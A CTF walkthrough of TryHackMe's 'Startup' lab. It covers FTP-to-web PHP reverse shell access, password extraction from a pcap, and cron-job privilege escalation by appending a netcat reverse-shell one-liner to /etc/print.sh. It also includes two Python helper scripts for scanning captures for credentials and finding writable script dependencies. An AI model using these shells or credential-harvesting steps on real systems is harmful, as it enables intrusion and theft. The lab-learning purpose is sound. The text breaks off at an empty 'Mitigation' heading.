Startup is a room rated “Easy” on TryHackMe. Initial access was gained by uploading a reverse shell to the anonymous FTP server and triggering it through the web server. Privilege escalation to root was possible through write access to a script that is executed by a root cron job.

Enumeration

sudo nmap -oN nmap -sC -sV 10.10.86.86

The output of this scan will be the following:

Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-07 15:28 EST
Nmap scan report for localhost (10.10.86.86)
Host is up (0.045s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxrwx 2 65534 65534 4096 Nov 12 04:53 ftp [NSE: writeable]
| -rw-r--r-- 1 0 0 251631 Nov 12 04:02 important.jpg
|_-rw-r--r-- 1 0 0 208 Nov 12 04:53 notice.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.9.73.174
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b9:a6:0b:84:1d:22:01:a4:01:30:48:43:61:2b:ab:94 (RSA)
| 256 ec:13:25:8c:18:20:36:e6:ce:91:0e:16:26:eb:a2:be (ECDSA)
|_ 256 a2:ff:2a:72:81:aa:a2:9f:55:a4:dc:92:23:e6:b4:3f (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Maintenance
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.86 seconds

As you can see, an FTP server is running on port 21, an SSH server on port 22 and a web server on port 80. Anonymous login is also enabled on the FTP server. Log in with the following command using the username “anonymous” and a blank password:

ftp 10.10.86.86

As you can see there is a “notice.txt” and a JPG file. Furthermore, we have write access to the “ftp” directory. A dirb scan of the web server reveals that the “ftp” directory is served as http://10.10.86.86/files/, so anything we upload via FTP can be requested (and, for PHP files, executed) through the web server.

Initial Access

Upload a PHP reverse shell (here named shell.php, configured to connect back to your attacker machine on port 1234) into the writable “ftp” directory, then start a listener on that port:

nc -lvnp 1234

Finally trigger the reverse shell by requesting http://10.10.86.86/files/shell.php. After that you should have a shell on the machine.

Inside the root directory (“/”) there is a file called “recipe.txt”, which contains the secret recipe. There is also an interesting directory called “incidents”. It contains a pcap file which we can download and analyse with Wireshark. The capture records a security incident and also contains lennie’s password in plain text.
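Wireshark’s “Follow TCP Stream” is the quickest way to pull the password out of the capture by hand. As an added example that is not part of this writeup (and that does not reproduce the room’s capture or lennie’s real password), the following Python script does the same job from the command line with only the standard library: it parses a classic little-endian pcap, walks Ethernet/IPv4/TCP, concatenates each direction of a connection in capture order and searches the reassembled data for common credential markers. The capture it analyses is constructed inline (a made-up FTP login and an HTTP form post with fake hosts, users and passwords); SAMPLE_PCAP, build_pcap and CRED_PATTERNS are my assumptions, not anything from the room.

```python
"""Pull plaintext credentials out of a pcap with the standard library only.

Added example: a scriptable stand-in for Wireshark's "Follow TCP Stream".
Handles the classic little-endian pcap format with Ethernet/IPv4/TCP frames.
Segments are concatenated in capture order: no seq-number reordering or
retransmission handling, no pcapng, no IPv6 or VLAN tags.
"""
import re
import struct
from collections import defaultdict

PCAP_MAGIC = 0xA1B2C3D4   # classic pcap, microsecond timestamps
LINKTYPE_ETHERNET = 1


def build_pcap(packets):
    """Serialise (src_ip, sport, dst_ip, dport, payload) tuples into a pcap.

    Only used to construct the sample capture below. Zeroed MACs and
    checksums are enough for a parser (and Wireshark) to follow the stream.
    """
    out = bytearray(struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535,
                                LINKTYPE_ETHERNET))
    for i, (src, sport, dst, dport, payload) in enumerate(packets):
        # TCP header: 20 bytes (data offset 5), flags PSH|ACK, no options
        tcp = struct.pack("!HHIIBBHHH", sport, dport, i * 100, 0, 0x50, 0x18,
                          8192, 0, 0) + payload
        # IPv4 header: 20 bytes, protocol 6 (TCP)
        ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), i, 0, 64, 6, 0,
                         bytes(int(o) for o in src.split(".")),
                         bytes(int(o) for o in dst.split("."))) + tcp
        frame = b"\x00" * 12 + b"\x08\x00" + ip      # Ethernet II, type IPv4
        out += struct.pack("<IIII", 1600000000 + i, 0, len(frame), len(frame))
        out += frame
    return bytes(out)


def tcp_payloads(pcap_bytes):
    """Yield (src_ip, sport, dst_ip, dport, payload) per data-bearing TCP segment."""
    magic, = struct.unpack_from("<I", pcap_bytes, 0)
    if magic != PCAP_MAGIC:
        raise ValueError("unsupported capture format (magic %#x)" % magic)
    linktype, = struct.unpack_from("<I", pcap_bytes, 20)
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are handled")
    off = 24
    while off + 16 <= len(pcap_bytes):
        _, _, incl_len, _ = struct.unpack_from("<IIII", pcap_bytes, off)
        frame = pcap_bytes[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":   # not IPv4
            continue
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4                              # IPv4 header length
        total_len, = struct.unpack_from("!H", ip, 2)
        if ip[9] != 6:                                        # not TCP
            continue
        src = ".".join(str(b) for b in ip[12:16])
        dst = ".".join(str(b) for b in ip[16:20])
        tcp = ip[ihl:total_len]
        sport, dport = struct.unpack_from("!HH", tcp, 0)
        payload = tcp[(tcp[12] >> 4) * 4:]                    # skip TCP header+options
        if payload:
            yield src, sport, dst, dport, payload


def reassemble_streams(pcap_bytes):
    """Concatenate payloads per direction, keyed by (src, sport, dst, dport)."""
    streams = defaultdict(bytearray)
    for src, sport, dst, dport, payload in tcp_payloads(pcap_bytes):
        streams[(src, sport, dst, dport)] += payload
    return {k: bytes(v) for k, v in streams.items()}


# Markers that usually sit right next to a cleartext secret: FTP/POP3-style
# USER/PASS lines and form- or config-style password=... fields.
CRED_PATTERNS = [
    re.compile(rb"^USER\s+\S+", re.M | re.I),
    re.compile(rb"^PASS\s+\S+", re.M | re.I),
    re.compile(rb"(?:password|passwd|pwd)\s*[:=]\s*[^\s&]+", re.I),
]


def find_plaintext_credentials(pcap_bytes):
    """Return [(flow, matched_text)] for every credential-looking string."""
    hits = []
    for (src, sport, dst, dport), data in reassemble_streams(pcap_bytes).items():
        flow = f"{src}:{sport}->{dst}:{dport}"
        for pat in CRED_PATTERNS:
            for m in pat.finditer(data):
                hits.append((flow, m.group(0).decode(errors="replace").strip()))
    return hits


# Constructed sample capture (made-up hosts, users and passwords).
SAMPLE_PCAP = build_pcap([
    ("10.0.0.5", 40001, "10.0.0.9", 21, b"USER testuser\r\n"),
    ("10.0.0.9", 21, "10.0.0.5", 40001, b"331 Please specify the password.\r\n"),
    ("10.0.0.5", 40001, "10.0.0.9", 21, b"PASS Sup3rS3cret!\r\n"),
    ("10.0.0.5", 40002, "10.0.0.9", 80,
     b"POST /login HTTP/1.1\r\nHost: 10.0.0.9\r\n\r\nuser=alice&password=letmein&x=1"),
])

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PCAP
    for flow, text in find_plaintext_credentials(data):
        print(flow, text)
```

Run it with the downloaded capture as the first argument to scan the real file; without arguments it scans the constructed sample. The patterns are deliberately loose, so treat every hit as a lead to confirm in Wireshark rather than a verified credential.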

With these credentials we can log in as lennie and get the user flag. Inside lennie’s home folder there is a folder called “scripts”, which contains a script called “planner.sh”. It is owned by root and calls the script /etc/print.sh, for which we have write permissions. So we can place the following reverse shell inside /etc/print.sh:

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ATTACKER_MACHINE_TUN0_IP 4444 >/tmp/f' >> /etc/print.sh

Then start a listener on port 4444 on your attacker machine (nc -lvnp 4444). The next time the cron job runs planner.sh as root, /etc/print.sh is executed as root and you should get a root shell, which lets you read the root flag.
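The root cause here is a root cron job executing a script that in turn calls a file a low-privileged user can write. As an added example that is not part of this writeup, the following Python script automates that check: it extracts the absolute paths a shell script references and reports the ones the current user can modify directly, or replace because the parent directory is writable, or create because the file is missing from a writable directory. It runs against a constructed stand-in for planner.sh and a constructed filesystem view (the room’s real planner.sh is not reproduced, and the extra /opt/reports/daily.py dependency is my invention to show the missing-file variant); pointed at the real script on the box it uses the actual filesystem.

```python
"""Spot files a root-run script depends on that a low-privileged user can alter.

Added example: a static check for the pattern behind the privilege escalation
above (a root cron job runs planner.sh, which calls a writable /etc/print.sh).
"""
import os
import re

# An absolute path at the start of a line or after whitespace, a shell
# separator or a quote, optionally preceded by `source`, `.` or an interpreter.
PATH_RE = re.compile(
    r"(?:^|[\s;&|(\"'])(?:source\s+|\.\s+|(?:ba|da|z)?sh\s+)?(/[\w./-]+)", re.M)


def referenced_paths(script_text):
    """Absolute paths a script mentions, sorted and de-duplicated."""
    return sorted({m.group(1) for m in PATH_RE.finditer(script_text)})


def weak_links(script_text, exists=os.path.exists,
               writable=lambda p: os.access(p, os.W_OK)):
    """Return [(path, reason)] for referenced files the current user can tamper with.

    `exists` and `writable` default to the real filesystem and are injectable
    so the check can run against a constructed layout (see demo()).
    Caveat: a writable parent with the sticky bit set (e.g. /tmp) only lets you
    replace files you own; os.access does not express that, so confirm such
    hits by hand.
    """
    findings = []
    for path in referenced_paths(script_text):
        parent = os.path.dirname(path) or "/"
        if exists(path) and writable(path):
            findings.append((path, "file is writable"))
        elif not exists(path) and exists(parent) and writable(parent):
            findings.append((path, "missing; parent directory is writable"))
        elif exists(path) and exists(parent) and writable(parent):
            findings.append((path, "parent directory is writable (file can be replaced)"))
    return findings


# Constructed stand-in for the planner.sh described above; the room's real
# script is not reproduced here.
PLANNER_SH = """#!/bin/bash
/etc/print.sh
/usr/bin/python3 /opt/reports/daily.py
"""

# Constructed filesystem view: which paths exist and which ones we may write.
FAKE_EXISTING = {"/etc", "/etc/print.sh", "/usr/bin", "/usr/bin/python3", "/opt/reports"}
FAKE_WRITABLE = {"/etc/print.sh", "/opt/reports"}


def demo():
    """Run the check against the constructed script and filesystem view."""
    return weak_links(PLANNER_SH, exists=FAKE_EXISTING.__contains__,
                      writable=FAKE_WRITABLE.__contains__)


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:      # e.g. python3 weak_links.py /home/lennie/scripts/planner.sh
        with open(sys.argv[1]) as f:
            results = weak_links(f.read())
    else:
        results = demo()
    for path, reason in results:
        print(f"{path}: {reason}")
```

The path regex is a heuristic: it will miss paths built from variables and may pick up paths inside comments, so read the script as well. The same check is worth running on every script referenced from /etc/crontab, /etc/cron.d and root’s crontab, since any of them is a potential privilege escalation if a non-root user can influence what it executes.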

Mitigation
